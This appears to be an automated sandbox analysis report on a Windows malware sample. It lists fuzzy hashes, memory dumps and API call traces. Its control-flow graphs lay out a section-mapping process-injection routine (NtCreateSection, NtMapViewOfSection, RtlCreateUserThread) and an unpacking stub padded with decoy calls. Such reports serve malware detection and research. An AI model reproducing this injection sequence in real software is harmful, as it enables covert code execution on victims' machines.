                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: b2b5b9465f207d8d33be367c208e7fcc32e9a6624e169b0ee07fb584f3c5f3f5
                                                                                                                                                                • Instruction ID: 51d28d607b2bf0c6be485ba67b57a1d92e8d7f3091ffbd4f6d5742e632961af3
                                                                                                                                                                • Opcode Fuzzy Hash: b2b5b9465f207d8d33be367c208e7fcc32e9a6624e169b0ee07fb584f3c5f3f5
                                                                                                                                                                • Instruction Fuzzy Hash: 75F0559151C3804BC7616F309889752BFA8AF273AAB1880FF8441A92C3F03E4E06C30F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: d352eaf029c9311bb01c48030991ac49a0b170cda5c36220cdf8f8a41f6a56c1
                                                                                                                                                                • Instruction ID: 973bb0815bb9229e93df1df71aa6ae32e96e2be28a84a13a50005fc9370f71b1
                                                                                                                                                                • Opcode Fuzzy Hash: d352eaf029c9311bb01c48030991ac49a0b170cda5c36220cdf8f8a41f6a56c1
                                                                                                                                                                • Instruction Fuzzy Hash: C2E02260008A805BC7165F24A989622AF9C6B0A71BB0840FF8481A92C3D12D4A06834F
                                                                                                                                                                APIs
                                                                                                                                                                • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418B34
                                                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418B46
                                                                                                                                                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418B81
                                                                                                                                                                • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00418B8F
                                                                                                                                                                • OpenJobObjectA.KERNEL32(00000000,00000000,0041B388), ref: 00418B9E
                                                                                                                                                                • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BB0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519684394.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_40b000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
                                                                                                                                                                • String ID: -
                                                                                                                                                                • API String ID: 2332831159-2547889144
                                                                                                                                                                • Opcode ID: 5e2e18812709dbbfbd16d3132f3650d7e0538531bdec8af4ad055abf3aa7d160
                                                                                                                                                                • Instruction ID: 677527fee2e31da48b0f78a64988b8bc3df04c21d5f76ad85ec8a00fc73180d6
                                                                                                                                                                • Opcode Fuzzy Hash: 5e2e18812709dbbfbd16d3132f3650d7e0538531bdec8af4ad055abf3aa7d160
                                                                                                                                                                • Instruction Fuzzy Hash: 94116B71A49304BBE7209FA0EC46FEA3F74AB08B11F204129FB04691C1CAB82981875F
                                                                                                                                                                APIs
                                                                                                                                                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418B81
                                                                                                                                                                • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00418B8F
                                                                                                                                                                • OpenJobObjectA.KERNEL32(00000000,00000000,0041B388), ref: 00418B9E
                                                                                                                                                                • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BB0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519684394.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_40b000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
                                                                                                                                                                • String ID: -
                                                                                                                                                                • API String ID: 1414951042-2547889144
                                                                                                                                                                • Opcode ID: 2299a56ff30a40d6bd7fe4c42dee0eb7b50c8d560fcc531e9162b1cde90d6cde
                                                                                                                                                                • Instruction ID: 0a3812f3688d595350d52c489f49ccd1e134694a55c2d67ff5c1230b235e6e50
                                                                                                                                                                • Opcode Fuzzy Hash: 2299a56ff30a40d6bd7fe4c42dee0eb7b50c8d560fcc531e9162b1cde90d6cde
                                                                                                                                                                • Instruction Fuzzy Hash: B4F0C871B85304ABD7208F94EC46BD97B60FB09725F214259F6046E1C1C7B52951DB8B
                                                                                                                                                                APIs
                                                                                                                                                                • QueryDosDeviceA.KERNEL32(0041B398,?,00000000), ref: 00418C17
                                                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418C32
                                                                                                                                                                • HeapDestroy.KERNEL32(00000000), ref: 00418C51
                                                                                                                                                                • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418C60
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519684394.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_40b000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4159173863-0
                                                                                                                                                                • Opcode ID: 1a1355a4214cf67f46c550b7ed4b3c0a02d7eb781624a2e4aa6250646aa1c127
                                                                                                                                                                • Instruction ID: 756bc8bfdf9d8d10eb6f9b921beda427f38e019a2e514af8c0d7042b50038681
                                                                                                                                                                • Opcode Fuzzy Hash: 1a1355a4214cf67f46c550b7ed4b3c0a02d7eb781624a2e4aa6250646aa1c127
                                                                                                                                                                • Instruction Fuzzy Hash: E901D8B4A012049BCB20AF64ED45BDA3778EB18745F40407BFB05A7290DE345984CFAA

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:9.4%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:28.8%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:170
                                                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                                                execution_graph 3405 402e40 3407 402e37 3405->3407 3408 402edf 3407->3408 3409 4018e6 3407->3409 3410 4018f5 3409->3410 3411 40192e Sleep 3410->3411 3412 401949 3411->3412 3414 40195a 3412->3414 3415 401514 3412->3415 3414->3408 3416 401524 3415->3416 3417 4015c4 NtDuplicateObject 3416->3417 3421 4016e0 3416->3421 3418 4015e1 NtCreateSection 3417->3418 3417->3421 3419 401661 NtCreateSection 3418->3419 3420 401607 NtMapViewOfSection 3418->3420 3419->3421 3423 40168d 3419->3423 3420->3419 3422 40162a NtMapViewOfSection 3420->3422 3421->3414 3422->3419 3424 401648 3422->3424 3423->3421 3425 401697 NtMapViewOfSection 3423->3425 3424->3419 3425->3421 3426 4016be NtMapViewOfSection 3425->3426 3426->3421 3427 4190c0 3430 418c80 3427->3430 3429 4190c5 3431 418c8d 3430->3431 3432 418d90 7 API calls 3431->3432 3439 418ee3 3431->3439 3434 418e15 7 API calls 3432->3434 3433 418ef1 SetCommMask 3433->3439 3435 418ec1 3434->3435 3436 418eb5 ObjectPrivilegeAuditAlarmA 3434->3436 3437 418ed2 3435->3437 3438 418eca WaitForSingleObject 3435->3438 3436->3435 3437->3439 3438->3437 3439->3433 3440 418f01 GetUserObjectInformationW 3439->3440 3441 418f22 3439->3441 3440->3439 3442 418f2b GetConsoleAliasesLengthA GetComputerNameW GetConsoleAliasExesLengthW GetBinaryType PurgeComm 3441->3442 3443 418f9d 3441->3443 3450 418f7b 3442->3450 3456 418910 LocalAlloc 3443->3456 3447 418fa2 LoadLibraryA 3457 418940 GetModuleHandleW GetProcAddress VirtualProtect 3447->3457 3448 418fed 3458 418be0 3448->3458 3450->3443 3451 419009 MoveFileW 3452 418ff2 3451->3452 3452->3451 3453 419033 InterlockedCompareExchange 3452->3453 3455 41904d 3452->3455 3453->3452 3455->3429 3456->3447 3457->3448 3459 418c09 QueryDosDeviceA 3458->3459 3460 418c1d 3458->3460 3459->3460 3469 418ae0 3460->3469 3463 418c30 FreeEnvironmentStringsA 3464 418c38 3463->3464 3472 418b20 3464->3472 3467 418c66 3467->3452 3468 418c4f HeapDestroy GetNumaProcessorNode 3468->3467 3470 418af1 FatalAppExitA GetModuleHandleW 3469->3470 3471 418b03 3469->3471 3470->3471 3471->3463 3471->3464 3473 418b3c 3472->3473 3474 418b2e BuildCommDCBA 3472->3474 3475 418b44 FreeEnvironmentStringsA 3473->3475 3478 418b4c 3473->3478 3474->3478 3475->3478 3476 418bbb 3476->3467 3476->3468 3478->3476 3479 418b7d GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 3478->3479 3480 418b10 3478->3480 3479->3478 3483 418a90 3480->3483 3484 418abb 3483->3484 3485 418aac SetPriorityClass 3483->3485 3484->3478 3485->3484 3584 401542 3585 40153b 3584->3585 3586 4016e0 3585->3586 3587 4015c4 NtDuplicateObject 3585->3587 3587->3586 3588 4015e1 NtCreateSection 3587->3588 3589 401661 NtCreateSection 3588->3589 3590 401607 NtMapViewOfSection 3588->3590 3589->3586 3592 40168d 3589->3592 3590->3589 3591 40162a NtMapViewOfSection 3590->3591 3591->3589 3593 401648 3591->3593 3592->3586 3594 401697 NtMapViewOfSection 3592->3594 3593->3589 3594->3586 3595 4016be NtMapViewOfSection 3594->3595 3595->3586 3486 5f003c 3487 5f0049 3486->3487 3499 5f0e0f SetErrorMode SetErrorMode 3487->3499 3492 5f0265 3493 5f02ce VirtualProtect 3492->3493 3495 5f030b 3493->3495 3494 5f0439 VirtualFree 3498 5f04be LoadLibraryA 3494->3498 3495->3494 3497 5f08c7 3498->3497 3500 5f0223 3499->3500 3501 5f0d90 3500->3501 3502 5f0dad 3501->3502 3503 5f0dbb GetPEB 3502->3503 3504 5f0238 VirtualAlloc 3502->3504 3503->3504 3504->3492 3505 641022 3508 641032 3505->3508 3509 641041 3508->3509 3512 6417d2 3509->3512 3514 6417ed 3512->3514 3513 6417f6 CreateToolhelp32Snapshot 3513->3514 3515 641812 Module32First 3513->3515 3514->3513 3514->3515 3516 641821 3515->3516 3517 641031 3515->3517 3519 641491 3516->3519 3520 6414bc 3519->3520 3521 6414cd VirtualAlloc 3520->3521 3522 641505 3520->3522 3521->3522 3522->3522 3648 402dd0 3649 402ddc 3648->3649 3650 402edf 3649->3650 3651 4018e6 8 API calls 3649->3651 3651->3650 3565 4018f1 3566 4018f6 3565->3566 3567 40192e Sleep 3566->3567 3568 401949 3567->3568 3569 401514 7 API calls 3568->3569 3570 40195a 3568->3570 3569->3570 3635 401915 3636 4018c6 3635->3636 3637 40191a 3635->3637 3638 40192e Sleep 3637->3638 3639 401949 3638->3639 3640 401514 7 API calls 3639->3640 3641 40195a 3639->3641 3640->3641 3523 402f97 3524 4030ee 3523->3524 3525 402fc1 3523->3525 3525->3524 3526 40307c RtlCreateUserThread NtTerminateProcess 3525->3526 3526->3524 3620 418b56 3621 418b60 3620->3621 3622 418b10 SetPriorityClass 3621->3622 3623 418b7d GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 3621->3623 3624 418bbb 3621->3624 3622->3621 3623->3621 3527 5f0005 3532 5f092b GetPEB 3527->3532 3529 5f0030 3534 5f003c 3529->3534 3533 5f0972 3532->3533 3533->3529 3535 5f0049 3534->3535 3536 5f0e0f 2 API calls 3535->3536 3537 5f0223 3536->3537 3538 5f0d90 GetPEB 3537->3538 3539 5f0238 VirtualAlloc 3538->3539 3540 5f0265 3539->3540 3541 5f02ce VirtualProtect 3540->3541 3543 5f030b 3541->3543 3542 5f0439 VirtualFree 3546 5f04be LoadLibraryA 3542->3546 3543->3542 3545 5f08c7 3546->3545 3625 402d7b 3626 402d38 3625->3626 3626->3625 3627 402dc7 3626->3627 3628 4018e6 8 API calls 3626->3628 3628->3627 3547 5f0001 3548 5f0005 3547->3548 3549 5f092b GetPEB 3548->3549 3550 5f0030 3549->3550 3551 5f003c 7 API calls 3550->3551 3552 5f0038 3551->3552 3571 4014fe 3572 401506 3571->3572 3573 401531 3571->3573 3574 4015c4 NtDuplicateObject 3573->3574 3578 4016e0 3573->3578 3575 4015e1 NtCreateSection 3574->3575 3574->3578 3576 401661 NtCreateSection 3575->3576 3577 401607 NtMapViewOfSection 3575->3577 3576->3578 3580 40168d 3576->3580 3577->3576 3579 40162a NtMapViewOfSection 3577->3579 3579->3576 3581 401648 3579->3581 3580->3578 3582 401697 NtMapViewOfSection 3580->3582 3581->3576 3582->3578 3583 4016be NtMapViewOfSection 3582->3583 3583->3578

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 418c80-418ca8 2 418cb0-418cb7 0->2 3 418ce4-418cea 2->3 4 418cb9-418ce0 2->4 5 418cec-418cf8 3->5 6 418cfe-418d08 3->6 4->3 5->6 7 418d43-418d4a 6->7 8 418d0a-418d39 6->8 7->2 9 418d50-418d56 7->9 8->7 11 418d58-418d5e 9->11 12 418d60-418d66 11->12 13 418d6c-418d76 11->13 12->13 14 418d78 13->14 15 418d7a-418d81 13->15 14->15 15->11 16 418d83-418d8a 15->16 17 418d90-418eb3 InterlockedCompareExchange SetFocus ReadConsoleA FindAtomW SearchPathA GetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExA CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameW GetSystemTimeAdjustment 16->17 18 418ee3-418eef 16->18 22 418ec1-418ec8 17->22 23 418eb5-418ebb ObjectPrivilegeAuditAlarmA 17->23 19 418ef1-418eff SetCommMask 18->19 26 418f11-418f17 19->26 27 418f01-418f0b GetUserObjectInformationW 19->27 24 418ed2-418ee0 22->24 25 418eca-418ecc WaitForSingleObject 22->25 23->22 24->18 25->24 28 418f22-418f29 26->28 29 418f19-418f20 26->29 27->26 31 418f2b-418f9a GetConsoleAliasesLengthA GetComputerNameW GetConsoleAliasExesLengthW GetBinaryType PurgeComm 28->31 32 418f9d-418fac call 418910 28->32 29->19 29->28 31->32 37 418fdd-418fe8 LoadLibraryA call 418940 32->37 38 418fae-418fbf 32->38 44 418fed-418ffe call 418be0 37->44 41 418fc0-418fd0 38->41 42 418fd2 41->42 43 418fd8-418fdb 41->43 42->43 43->37 43->41 49 419000-419007 44->49 50 419009-419017 MoveFileW 49->50 51 41901d-419023 49->51 50->51 53 419025 call 418930 51->53 54 41902a-419031 51->54 53->54 55 419033-41903e InterlockedCompareExchange 54->55 56 419044-41904b 54->56 55->56 56->49 59 41904d-41905d 56->59 61 419060-419070 59->61 63 419072 61->63 64 419079-41907c 61->64 63->64 64->61 65 41907e-419089 64->65 66 419090-419095 65->66 67 419097-41909d 66->67 68 41909f-4190a5 66->68 67->68 69 4190a7-4190b4 67->69 68->66 68->69
                                                                                                                                                                APIs
                                                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418D9B
                                                                                                                                                                • SetFocus.USER32(00000000), ref: 00418DA4
                                                                                                                                                                • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418DAF
                                                                                                                                                                • FindAtomW.KERNEL32(00000000), ref: 00418DB6
                                                                                                                                                                • SearchPathA.KERNEL32(0041B3E4,0041B3CC,0041B3B8,00000000,?,?), ref: 00418DDA
                                                                                                                                                                • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418DE2
                                                                                                                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418DFA
                                                                                                                                                                • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418E21
                                                                                                                                                                • CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418E2D
                                                                                                                                                                • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418E43
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00418E49
                                                                                                                                                                • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418E8E
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00418E9D
                                                                                                                                                                • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418EA6
                                                                                                                                                                • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418EBB
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418ECC
                                                                                                                                                                • SetCommMask.KERNELBASE(00000000,00000000), ref: 00418EF5
                                                                                                                                                                • GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00418F0B
                                                                                                                                                                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00418F3A
                                                                                                                                                                • GetComputerNameW.KERNEL32(?,?), ref: 00418F4E
                                                                                                                                                                • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418F54
                                                                                                                                                                • GetBinaryType.KERNEL32(0041B3F0,?), ref: 00418F66
                                                                                                                                                                • PurgeComm.KERNEL32(00000000,00000000), ref: 00418F6E
                                                                                                                                                                • LoadLibraryA.KERNELBASE(0041B410), ref: 00418FE2
                                                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00419017
                                                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041903E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809039411.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_40b000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Console$CommFileObject$CompareExchangeInterlockedLengthNamePathSearch$AdjustmentAlarmAliasAliasesAtomAuditBinaryComputerConfigCopyCreateDefaultEnvironmentExesFindFocusInformationLibraryLoadMaskModeModuleMoveOutputPipePrivilegePurgeReadSingleStringsSystemTimeTypeUserWaitWrite
                                                                                                                                                                • String ID: k`$}$
                                                                                                                                                                • API String ID: 87775671-956986773
                                                                                                                                                                • Opcode ID: c8a4e5b77a3355490554213bf8507c2ed9d8cb568ec84c329371616b9184d7c2
                                                                                                                                                                • Instruction ID: cec1c0038aff85c57551383c5b233afae2bf81415c058cacd0026c3a6edaf131
                                                                                                                                                                • Opcode Fuzzy Hash: c8a4e5b77a3355490554213bf8507c2ed9d8cb568ec84c329371616b9184d7c2
                                                                                                                                                                • Instruction Fuzzy Hash: 02B1B671901224ABCB219F61DC44BDF7B79EF5D714F00806AF609A71A1DB381A85CFAE

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 156 401514-401533 158 401524-40152f 156->158 159 401536-40156e call 401193 156->159 158->159 168 401570 159->168 169 401573-401578 159->169 168->169 171 401898-4018a0 169->171 172 40157e-40158f 169->172 171->169 177 4018a5-4018b7 171->177 175 401595-4015be 172->175 176 401896 172->176 175->176 186 4015c4-4015db NtDuplicateObject 175->186 176->177 182 4018c5 177->182 183 4018bc-4018e3 call 401193 177->183 182->183 186->176 188 4015e1-401605 NtCreateSection 186->188 190 401661-401687 NtCreateSection 188->190 191 401607-401628 NtMapViewOfSection 188->191 190->176 194 40168d-401691 190->194 191->190 193 40162a-401646 NtMapViewOfSection 191->193 193->190 196 401648-40165e 193->196 194->176 197 401697-4016b8 NtMapViewOfSection 194->197 196->190 197->176 199 4016be-4016da NtMapViewOfSection 197->199 199->176 200 4016e0 call 4016e5 199->200
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                                                • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                                                                                • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                                                • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 203 4014fe-401503 204 401531-40156e call 401193 203->204 205 401506-401511 203->205 215 401570 204->215 216 401573-401578 204->216 215->216 218 401898-4018a0 216->218 219 40157e-40158f 216->219 218->216 224 4018a5-4018b7 218->224 222 401595-4015be 219->222 223 401896 219->223 222->223 233 4015c4-4015db NtDuplicateObject 222->233 223->224 229 4018c5 224->229 230 4018bc-4018e3 call 401193 224->230 229->230 233->223 235 4015e1-401605 NtCreateSection 233->235 237 401661-401687 NtCreateSection 235->237 238 401607-401628 NtMapViewOfSection 235->238 237->223 241 40168d-401691 237->241 238->237 240 40162a-401646 NtMapViewOfSection 238->240 240->237 243 401648-40165e 240->243 241->223 244 401697-4016b8 NtMapViewOfSection 241->244 243->237 244->223 246 4016be-4016da NtMapViewOfSection 244->246 246->223 247 4016e0 call 4016e5 246->247
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1652636561-0
                                                                                                                                                                • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                                                • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                                                                                • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                                                • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 250 401542-40156e call 401193 259 401570 250->259 260 401573-401578 250->260 259->260 262 401898-4018a0 260->262 263 40157e-40158f 260->263 262->260 268 4018a5-4018b7 262->268 266 401595-4015be 263->266 267 401896 263->267 266->267 277 4015c4-4015db NtDuplicateObject 266->277 267->268 273 4018c5 268->273 274 4018bc-4018e3 call 401193 268->274 273->274 277->267 279 4015e1-401605 NtCreateSection 277->279 281 401661-401687 NtCreateSection 279->281 282 401607-401628 NtMapViewOfSection 279->282 281->267 285 40168d-401691 281->285 282->281 284 40162a-401646 NtMapViewOfSection 282->284 284->281 287 401648-40165e 284->287 285->267 288 401697-4016b8 NtMapViewOfSection 285->288 287->281 288->267 290 4016be-4016da NtMapViewOfSection 288->290 290->267 291 4016e0 call 4016e5 290->291
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1809016649.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_hehcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                                                • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                                                                                • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                                                • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 294 401549-40156e call 401193 298 401570 294->298 299 401573-401578 294->299 298->299 301 401898-4018a0 299->301 302 40157e-40158f 299->302 301->299 307 4018a5-4018b7 301->307 305 401595-4015be 302->305 306 401896 302->306 305->306 316 4015c4-4015db NtDuplicateObject 305->316 306->307 312 4018c5 307->312 313 4018bc-4018e3 call 401193 307->313 312->313 316->306 318 4015e1-401605 NtCreateSection 316->318 320 401661-401687 NtCreateSection 318->320 321 401607-401628 NtMapViewOfSection 318->321 320->306 324 40168d-401691 320->324 321->320 323 40162a-401646 NtMapViewOfSection 321->323 323->320 326 401648-40165e 323->326 324->306 327 401697-4016b8 NtMapViewOfSection 324->327 326->320 327->306 329 4016be-4016da NtMapViewOfSection 327->329 329->306 330 4016e0 call 4016e5 329->330
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
